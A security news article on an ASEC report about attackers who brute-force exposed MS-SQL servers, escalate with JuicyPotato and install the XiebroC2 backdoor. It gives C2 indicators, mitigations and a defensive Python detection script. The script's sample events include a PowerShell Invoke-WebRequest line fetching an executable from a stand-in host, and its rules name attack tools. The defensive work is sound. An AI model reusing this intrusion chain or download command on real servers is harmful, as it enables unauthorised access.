AhnLab Security Intelligence Center (ASEC) researchers have uncovered a surge in attacks targeting improperly managed MS-SQL servers, culminating in the deployment of the open-source XiebroC2 command-and-control (C2) framework.
Similar in functionality to legitimate tools like Cobalt Strike, XiebroC2 offers capabilities for information gathering, remote control, and defense evasion, making it an attractive option for threat actors seeking a cost-effective intrusion platform.
In one confirmed incident, attackers leveraged publicly exposed MS-SQL server credentials to gain unauthorized access.
After brute-forcing weak or default account passwords, the intruders executed a sequence of payload deployments common to MS-SQL compromises, with cryptocurrency miners being the primary malware of choice.
Once authenticated, the threat actors dropped JuicyPotato, a privilege-escalation utility that exploits specific Windows privileges present in the token of the running MS-SQL process.
Although the SQL Server service itself operates under a low-privilege account by default, JuicyPotato allowed the attackers to elevate to SYSTEM privileges.
With SYSTEM privileges secured, the attackers executed a PowerShell command to retrieve and install XiebroC2 directly from its GitHub repository.
Evidence of the download and execution was captured in server logs, showing PowerShell’s Invoke-WebRequest cmdlet pulling the XiebroC2 payload over HTTP. This sequence underscores the critical risk posed by publicly accessible database servers without robust credential policies or network-level access controls.
XiebroC2 Framework
XiebroC2’s implant component—the core backdoor functionality—is written in Go, providing cross-platform support for Windows, Linux, and macOS systems.

Once deployed, the implant initiates a connection to the attacker’s C2 server, authenticates using a preconfigured AES key, and awaits commands. Common features include:
- Reverse shell access.
- File and process management.
- Network monitoring and packet capture.
- Reverse proxy tunneling.
- Screenshot capture.
Upon execution, XiebroC2 collects environment details such as process ID (PID), hardware ID (HWID), computer name, and user name, then connects to the C2 server to register the compromised host. In the incident monitored by ASEC, the configuration parameters were as follows:
- HostPort: 1.94.185[.]235:8433.
- Protocol: Session/Reverse_Ws.
- ListenerName: test2.
- AesKey: QWERt_CSDMAHUATW.
These values enabled the implant to establish a persistent encrypted WebSocket session over TCP, providing resilient bidirectional communication even in the presence of network disruptions.
Once connected, the attacker can execute arbitrary commands or deploy additional payloads, cementing their foothold for further lateral movement or data exfiltration.
Mitigations
Enforce Strong Authentication Policies: Administrators must disable weak or default credentials on MS-SQL servers. Implementing complex, unique passwords and enabling account lockout policies will drastically reduce the success rate of brute-force and dictionary attacks.
Limit Public Exposure: MS-SQL instances should not be directly accessible from the Internet. Employ network segmentation and firewall rules to restrict database access to only authorized application servers or VPN endpoints.
Patch and Update: Ensure all endpoints running MS-SQL services are fully patched and running the latest security updates. Vulnerabilities in service-host processes can facilitate initial compromise and privilege escalation.
Monitor and Alert: Deploy intrusion-detection systems capable of flagging anomalous login attempts, unexpected privilege-escalation tool execution (e.g., JuicyPotato), and unusual outbound network connections—especially to unknown external IP addresses and uncommon ports.
Endpoint Protection: Utilize up-to-date antimalware solutions to detect and quarantine known tools like JuicyPotato and C2 framework components. Behavioral analysis can provide early warning of reconnaissance or lateral-movement activities.
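As an added illustration of the "Monitor and Alert" guidance above (example code written for this article, not ASEC's or XiebroC2's own), the following Python script runs simple correlation rules over constructed MS-SQL, process-creation and firewall events: a failed-login burst followed by a successful login from the same client, a JuicyPotato binary spawned under the SQL Server process, a SQL-spawned PowerShell Invoke-WebRequest download over plain HTTP, and an outbound connection to an external address on a non-standard port. The log layout, IP addresses, file paths and the 8433 destination port used in the sample are assumptions.

```python
import re
import ipaddress
from collections import Counter

# Constructed sample telemetry (not taken from the ASEC report): "source|message"
# lines imitating MS-SQL error-log, process-creation and firewall records.
SAMPLE_EVENTS = [
    *["mssql|Login failed for user 'sa'. [CLIENT: 203.0.113.7]"] * 6,
    "mssql|Login failed for user 'sa'. [CLIENT: 198.51.100.4]",
    "mssql|Login succeeded for user 'sa'. [CLIENT: 203.0.113.7]",
    "process|Parent=sqlservr.exe Image=C:\\Temp\\JuicyPotato.exe",
    "process|Parent=sqlservr.exe Image=powershell.exe CommandLine=Invoke-WebRequest http://example.invalid/x.exe",
    "network|Image=C:\\Temp\\x.exe Dest=192.0.2.10:8433",
    "network|Image=C:\\Temp\\svc.exe Dest=10.0.0.5:1433",
]

FAILED_LOGIN = re.compile(r"Login failed for user '([^']+)'.*\[CLIENT: ([\d.]+)\]")
OK_LOGIN = re.compile(r"Login succeeded for user '([^']+)'.*\[CLIENT: ([\d.]+)\]")
EXPECTED_PORTS = {80, 443}  # tune to the site's egress policy
# RFC 1918 ranges only; ipaddress.is_private would also hide TEST-NET addresses.
INTERNAL = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

def brute_force_then_success(events, threshold=5):
    """Clients whose failed-login count reached `threshold` and then logged in successfully."""
    fails, hits = Counter(), []
    for src, msg in events:
        if src != "mssql":
            continue
        if m := FAILED_LOGIN.search(msg):
            fails[m.group(2)] += 1
        elif (m := OK_LOGIN.search(msg)) and fails[m.group(2)] >= threshold:
            hits.append((m.group(2), m.group(1), fails[m.group(2)]))
    return hits

def analyze(lines):
    """Return (rule_name, detail) findings for the indicators named in the article."""
    events = [tuple(line.split("|", 1)) for line in lines]
    findings = [("brute_force_success", h) for h in brute_force_then_success(events)]
    for src, msg in events:
        if src == "process":
            if re.search(r"image=[^ ]*juicypotato", msg, re.I):
                findings.append(("privesc_tool", msg))
            if re.search(r"invoke-webrequest .*http://", msg, re.I) and "parent=sqlservr.exe" in msg.lower():
                findings.append(("sql_spawned_download", msg))
        elif src == "network":
            ip, port = msg.rsplit("Dest=", 1)[1].split(":")
            external = not any(ipaddress.ip_address(ip) in n for n in INTERNAL)
            if external and int(port) not in EXPECTED_PORTS:
                findings.append(("unusual_outbound", f"{ip}:{port}"))
    return findings
```

Running `analyze(SAMPLE_EVENTS)` yields one finding per stage of the intrusion chain; in practice the brute-force rule should additionally be bounded by a time window so that normal retries over a long period do not accumulate.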
ASEC continues to monitor emerging threats targeting database servers and urges organizations to adopt a defense-in-depth approach.
Failure to secure authentication mechanisms, maintain up-to-date patches, and restrict network access may lead to repeated infections and compromise of critical infrastructure. Preventive action today will safeguard against tomorrow’s advanced intrusion frameworks.